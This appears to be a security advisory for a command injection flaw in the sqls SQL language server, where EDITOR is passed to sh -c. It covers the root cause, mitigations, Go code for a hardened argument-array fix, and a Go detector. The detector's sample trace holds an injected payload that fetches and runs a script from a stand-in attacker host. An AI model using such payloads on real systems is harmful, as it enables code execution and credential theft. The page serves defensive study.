CVE-2025-61141 Overview
CVE-2025-61141 is a command injection vulnerability in sqls-server/sqls version 0.2.28, an SQL language server written in Go. The flaw resides in the openEditor function, which builds a shell command string from the EDITOR environment variable and the configuration file path and runs it with sh -c, without escaping or validating the EDITOR value. An attacker who can influence EDITOR in the environment of the sqls process can therefore execute arbitrary shell commands when the config command is run. The vulnerability is categorized under [CWE-77] (Improper Neutralization of Special Elements used in a Command, 'Command Injection').
Critical Impact
Successful exploitation enables arbitrary command execution with the privileges of the user running the sqls process. Because EDITOR is read from that process's environment, exploitation presupposes some influence over the environment (a project-level configuration file, a CI job definition, a shared workstation); once that is given, the attacker gains everything the developer account can reach, including source trees, credential files, and SSH keys, which can lead to wider system compromise.
Affected Products
- sqls-server/sqls version 0.2.28
- SQL language server deployments using the vulnerable config command
- Editor integrations (LSP clients) invoking sqls with attacker-influenced EDITOR values
Discovery Timeline
- 2025-10-30 - CVE-2025-61141 published to NVD
- 2026-04-15 - Last updated in NVD database
Technical Details for CVE-2025-61141
Vulnerability Analysis
The vulnerability exists in the openEditor function within sqls-server/sqls 0.2.28. When a user invokes the config command, the application constructs a shell command string by concatenating the value of the EDITOR environment variable with the configuration file path. This string is then passed to sh -c for execution.
Because the EDITOR value is interpolated into the shell command without escaping or argument-array execution, shell metacharacters such as ;, &&, |, and backticks are interpreted by the shell. An attacker who can influence the EDITOR variable can inject arbitrary commands that execute under the privileges of the sqls process.
Root Cause
The root cause is improper neutralization of special elements in a command string [CWE-77]. The application chose sh -c execution with string concatenation rather than invoking the editor binary directly via an argument array (for example, Go's exec.Command(editor, path) without a shell). This design pattern treats untrusted environment input as code. A common reason developers reach for sh -c here is that EDITOR may legitimately carry arguments (for example, a value such as code --wait), which exec.Command(editor, path) would treat as a single binary name; the correct fix is to split the value into an argument vector and execute it without a shell, so that separators and substitution syntax are never interpreted.
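As an added illustration (this is not sqls's own code; the real openEditor is not reproduced here, and the exact way it joins EDITOR and the path is assumed to be plain concatenation with a space), the following Go program builds the sh -c form described above next to an argv form that keeps an EDITOR value such as code --wait working while rejecting shell syntax. The commands are constructed but not executed, so the program is safe to run anywhere:

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"strings"
)

// vulnerableCommand mirrors the pattern described for openEditor: the EDITOR
// value is concatenated into one string and handed to sh -c. The command is
// returned, not run, so the reader can see exactly what the shell would parse.
func vulnerableCommand(editor, path string) *exec.Cmd {
	return exec.Command("sh", "-c", editor+" "+path)
}

// editorArgv splits EDITOR the way a hardened openEditor should: on whitespace
// only (so "code --wait" still works) and with an explicit rejection of anything
// a shell would treat specially. No shell is involved in the argv form, so such
// characters can only mean a misconfiguration or an injection attempt.
func editorArgv(editor, path string) ([]string, error) {
	fields := strings.Fields(editor)
	if len(fields) == 0 {
		return nil, errors.New("EDITOR is empty")
	}
	if i := strings.IndexAny(editor, ";&|`$()<>\n\"'\\"); i >= 0 {
		return nil, fmt.Errorf("EDITOR contains shell metacharacter %q", editor[i])
	}
	return append(fields, path), nil
}

// safeCommand is the argument-array replacement for the sh -c call.
func safeCommand(editor, path string) (*exec.Cmd, error) {
	argv, err := editorArgv(editor, path)
	if err != nil {
		return nil, err
	}
	return exec.Command(argv[0], argv[1:]...), nil
}

func main() {
	// Constructed sample inputs: a plain editor, an editor with a flag, and a payload.
	path := "/home/dev/.config/sqls/config.yml"
	for _, editor := range []string{"vim", "code --wait", "vim; id"} {
		fmt.Printf("EDITOR=%q\n  sh -c form: %q\n", editor, vulnerableCommand(editor, path).Args)
		cmd, err := safeCommand(editor, path)
		if err != nil {
			fmt.Printf("  argv form:  rejected (%v)\n", err)
			continue
		}
		fmt.Printf("  argv form:  %q\n", cmd.Args)
	}
}
```

The rejection list is deliberately broad: an editor command line has no legitimate need for separators, redirections, quotes or substitution, so a positive match is a safe reason to refuse rather than to try to escape.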
Attack Vector
Exploitation requires the attacker to control or influence the EDITOR environment variable in the process environment of sqls. This can occur in shared development environments, through malicious project-level configuration, container or CI pipeline manipulation, or via social engineering targeting developers. Once the variable is set with a payload such as vim; <command>, invoking the config command triggers command execution. For detailed technical write-ups, see the DW1 Advisory #54 and Lukmanern CVE-2025-61141 Analysis.
Detection Methods for CVE-2025-61141
Indicators of Compromise
- A sh process spawned by sqls whose -c command line contains more than the editor and the configuration path: separators such as ;, &&, ||, or |, or substitution syntax such as backticks or $(). sqls spawning sh for the config command is expected; the injected payload is what shows up in that command line.
- Descendants of that sh other than the configured editor, in particular curl, wget, nc, or a second shell such as bash.
- EDITOR environment variable values captured from the sqls process containing shell metacharacters (;, &&, ||, |, backticks, $()).
- Outbound network connections originating from the sqls process tree to untrusted hosts.
- Modifications to user shell profiles, SSH authorized_keys, or credential files shortly after a sqls config invocation.
Detection Strategies
- Monitor process execution telemetry for sqls parent processes spawning shells or download utilities.
- Inspect process environment data for EDITOR variables containing command separators or substitution syntax.
- Audit the full argv of sh -c invocations whose parent is sqls; the injected commands appear verbatim in the -c string, so pattern-match on command separators and substitution syntax there rather than alerting on sh -c itself.
Monitoring Recommendations
- Enable detailed process creation logging (Linux auditd execve, macOS Endpoint Security) on developer endpoints running sqls.
- Alert on sqls writing to or reading from sensitive paths such as ~/.ssh/, ~/.aws/, or shell rc files.
- Track installations of sqls binaries at version 0.2.28 across managed endpoints via software inventory.
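The detection strategies above, as an added example that is not part of the original advisory and not a sqls or vendor tool: the Go program below runs three rules over a constructed process-creation trace (the event shape, PIDs, paths and the attacker.example host are all invented for this illustration; a real deployment would feed it auditd execve or EDR records). It distinguishes a benign sqls config run from an injected one by inspecting the sh -c command line and the process tree rather than the presence of sh:

```go
package main

import (
	"fmt"
	"strings"
)

// ProcEvent is a simplified process-creation record. Constructed for this
// example; the fields loosely follow what auditd execve or an EDR provides.
type ProcEvent struct {
	PID, PPID int
	Comm      string
	Argv      []string
	Editor    string // EDITOR from the process environment, if the sensor captured it
}

// Finding is one alert produced by detect.
type Finding struct {
	PID  int
	Rule string
}

// shellMeta lists the characters that turn an EDITOR value into more than one command.
const shellMeta = ";&|`$()<>\n"

// downloaders are tools that have no business running under an SQL language server.
var downloaders = map[string]bool{
	"curl": true, "wget": true, "nc": true, "ncat": true, "bash": true, "python3": true,
}

// isDescendantOfSqls walks the parent chain until it reaches sqls or a PID not in the trace.
func isDescendantOfSqls(ev ProcEvent, byPID map[int]ProcEvent) bool {
	for p, ok := byPID[ev.PPID]; ok; p, ok = byPID[p.PPID] {
		if p.Comm == "sqls" {
			return true
		}
	}
	return false
}

// detect applies the three rules from the advisory's detection section.
func detect(events []ProcEvent) []Finding {
	byPID := make(map[int]ProcEvent, len(events))
	for _, ev := range events {
		byPID[ev.PID] = ev
	}
	var out []Finding
	for _, ev := range events {
		// Rule 1: EDITOR carrying shell syntax in the environment of sqls itself.
		if ev.Comm == "sqls" && strings.ContainsAny(ev.Editor, shellMeta) {
			out = append(out, Finding{ev.PID, "sqls environment: EDITOR contains shell metacharacters"})
		}
		if !isDescendantOfSqls(ev, byPID) {
			continue
		}
		// Rule 2: sh -c under sqls is expected for `sqls config`; the injected payload
		// appears in the -c string, so inspect that rather than alerting on sh.
		if ev.Comm == "sh" && len(ev.Argv) >= 3 && ev.Argv[1] == "-c" && strings.ContainsAny(ev.Argv[2], shellMeta) {
			out = append(out, Finding{ev.PID, "sh -c command line from sqls contains shell metacharacters"})
		}
		// Rule 3: download or network utilities anywhere in the sqls process tree.
		if downloaders[ev.Comm] {
			out = append(out, Finding{ev.PID, "network/download utility spawned under sqls"})
		}
	}
	return out
}

// sampleEvents is a constructed trace: a benign `sqls config` run (PIDs 100-103)
// followed by an injected one (PIDs 200-204). Note how the config path ends up
// appended to the last injected command, exactly as string concatenation would do.
func sampleEvents() []ProcEvent {
	cfg := "/home/dev/.config/sqls/config.yml"
	return []ProcEvent{
		{PID: 100, PPID: 1, Comm: "nvim", Argv: []string{"nvim"}},
		{PID: 101, PPID: 100, Comm: "sqls", Argv: []string{"sqls", "config"}, Editor: "vim"},
		{PID: 102, PPID: 101, Comm: "sh", Argv: []string{"sh", "-c", "vim " + cfg}},
		{PID: 103, PPID: 102, Comm: "vim", Argv: []string{"vim", cfg}},
		{PID: 200, PPID: 1, Comm: "sqls", Argv: []string{"sqls", "config"}, Editor: "vim; curl -s http://attacker.example/x | sh"},
		{PID: 201, PPID: 200, Comm: "sh", Argv: []string{"sh", "-c", "vim; curl -s http://attacker.example/x | sh " + cfg}},
		{PID: 202, PPID: 201, Comm: "vim", Argv: []string{"vim"}},
		{PID: 203, PPID: 201, Comm: "curl", Argv: []string{"curl", "-s", "http://attacker.example/x"}},
		{PID: 204, PPID: 201, Comm: "sh", Argv: []string{"sh", cfg}},
	}
}

func main() {
	for _, f := range detect(sampleEvents()) {
		fmt.Printf("pid %d: %s\n", f.PID, f.Rule)
	}
}
```

Rule 2 is the one with the best signal-to-noise: the benign run also spawns sh -c, but its command line is just the editor and the path, so it produces no finding, while the injected run is flagged even if the payload never touches the network.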
How to Mitigate CVE-2025-61141
Immediate Actions Required
- Inventory all endpoints and CI runners running sqls-server/sqls 0.2.28 and isolate any that source EDITOR from untrusted contexts.
- Override EDITOR (and VISUAL, if your environment sets it) with the absolute path of a trusted editor binary before invoking sqls, rather than relying on values exported by shell profiles or project-level environment files.
- Avoid running the sqls config command until a patched version is installed.
Patch Information
At the time of NVD publication, no fixed version is referenced in the advisory. Monitor the GitHub SQLS Server Repository for upstream commits that replace sh -c invocation with direct argument-array execution, and upgrade once a fixed release is published.
Workarounds
- Set EDITOR to an absolute path to a trusted editor binary (for example, /usr/bin/vim) without any additional arguments or shell metacharacters.
- Run sqls under a least-privileged user account to limit the blast radius of arbitrary command execution.
- Restrict the ability of project-level configuration or dotfiles to modify the EDITOR variable in shared environments.
# Configuration example: pin EDITOR to a trusted absolute path before invoking sqls.
# Run this in the same shell session that will launch sqls, after any profile or
# project-level environment files have been sourced, so nothing overrides it later.
export EDITOR=/usr/bin/vim
unset VISUAL
sqls config
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.